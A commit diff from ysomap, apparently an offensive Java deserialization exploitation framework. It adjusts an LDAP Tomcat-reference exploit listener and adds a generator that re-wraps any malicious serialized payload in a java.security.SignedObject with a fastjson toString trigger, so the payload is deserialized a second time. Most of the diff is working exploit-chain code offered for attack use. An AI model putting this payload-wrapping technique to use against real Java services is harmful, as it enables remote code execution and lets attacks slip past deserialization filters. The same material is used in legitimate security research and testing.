remove unnecessary payloads

core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java

@@ -77,11 +77,10 @@ public String getPayload(String data){
 
     public static Bullet newInstance(Object...args) throws Exception {
         Bullet bullet = new TomcatRefBullet();
-        bullet.set("body", args[0]);
-        bullet.set("classname", args[1]);
-        bullet.set("filepath", args[2]);
-        bullet.set("type", args[3]);
-
+        bullet.set("type", args[0]);
+        bullet.set("body", args[1]);
+        bullet.set("classname", args[2]);
+        bullet.set("filepath", args[3]);
         return bullet;
     }
 }

core/src/main/java/ysomap/bullets/objects/ReturnObjectBullet.java

@@ -0,0 +1,24 @@
+package ysomap.bullets.objects;
+
+import ysomap.bullets.AbstractBullet;
+import ysomap.bullets.Bullet;
+import ysomap.common.annotation.NotNull;
+import ysomap.common.annotation.Require;
+
+public class ReturnObjectBullet extends AbstractBullet<Object> {
+
+    @NotNull
+    @Require(name = "object", detail = "")
+    public Object obj;
+
+    @Override
+    public Object getObject() throws Exception {
+        return obj;
+    }
+
+    public static Bullet<Object> newInstance(Object... args) throws Exception {
+        ReturnObjectBullet bullet = new ReturnObjectBullet();
+        bullet.set("obj", args[0]);
+        return bullet;
+    }
+}

core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java

@@ -11,7 +11,6 @@
 import ysomap.common.util.Strings;
 import ysomap.core.serializer.Serializer;
 import ysomap.core.serializer.SerializerFactory;
-import ysomap.core.util.DetailHelper;
 import ysomap.exploits.AbstractExploit;
 import ysomap.exploits.ldap.component.LocalChainOperationInterceptor;
 
@@ -64,7 +63,7 @@ public void work() {
                     SocketFactory.getDefault(),
                     (SSLSocketFactory) SSLSocketFactory.getDefault()));
             Serializer serializer = SerializerFactory.createSerializer("default");
-            Bullet bullet = TomcatRefBullet.newInstance(type, body,classname,filepath);
+            Bullet bullet = TomcatRefBullet.newInstance(type, body, classname, filepath);
             config.addInMemoryOperationInterceptor(
                     new LocalChainOperationInterceptor((byte[]) serializer.serialize(bullet.getObject())));
             ds = new InMemoryDirectoryServer(config);

core/src/main/java/ysomap/exploits/objects/DoubleDeserializePayloadGenerator.java

@@ -0,0 +1,72 @@
+package ysomap.exploits.objects;
+
+import com.alibaba.fastjson.JSONObject;
+import ysomap.bullets.Bullet;
+import ysomap.bullets.objects.ReturnObjectBullet;
+import ysomap.common.annotation.*;
+import ysomap.common.util.Status;
+import ysomap.core.serializer.Serializer;
+import ysomap.core.serializer.SerializerFactory;
+import ysomap.core.util.PayloadHelper;
+import ysomap.core.util.ReflectionHelper;
+import ysomap.exploits.AbstractExploit;
+import ysomap.payloads.AbstractPayload;
+import ysomap.payloads.Payload;
+
+import java.util.ArrayList;
+import java.util.List;
+
+@Exploits
+@Authors({Authors.WH1T3P1G, Authors.whocansee})
+@Require(bullets = {"Any Java Serialization Payload"}, param = false)
+@Details("用于二次封装恶意序列化数据，触发二次反序列化")
+public class DoubleDeserializePayloadGenerator extends AbstractExploit {
+
+    @NotNull
+    private Payload payload;
+
+    @Override
+    public void work() {
+        Serializer serializer = SerializerFactory.createSerializer("default");
+        try {
+            serializer.setEncoder("base64");
+            serializer.setOutputType("console");
+            Object obj = payload.getObject();
+            Payload signedObjectPayload = new SignedObjectPayload();
+            Bullet bullet = signedObjectPayload.getDefaultBullet(obj);
+            signedObjectPayload.setBullet(bullet);
+            SerializerFactory.serialize("ysomap", serializer, signedObjectPayload);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    @Override
+    public void stop() {
+        status = Status.STOPPED;
+    }
+
+    static class SignedObjectPayload extends AbstractPayload<Object> {
+
+        @Override
+        public Bullet getDefaultBullet(Object... args) throws Exception {
+            return ReturnObjectBullet.newInstance(args[0]);
+        }
+
+        @Override
+        public Object pack(Object obj) throws Exception {
+            Serializer serializer = SerializerFactory.createSerializer("default");
+            byte[] bytes = (byte[]) serializer.serialize(obj);
+
+            Object signedObj = ReflectionHelper.createWithoutConstructor("java.security.SignedObject");
+            ReflectionHelper.setFieldValue(signedObj, "content", bytes);
+            ReflectionHelper.setFieldValue(signedObj, "signature", new byte[0]);
+            JSONObject map = new JSONObject(); // also JSONArray
+            map.put("ysomap", signedObj);
+            List<Object> arrays = new ArrayList<>();
+            arrays.add(signedObj);
+            arrays.add(PayloadHelper.makeReadObjectToStringTrigger(map));
+            return arrays;
+        }
+    }
+}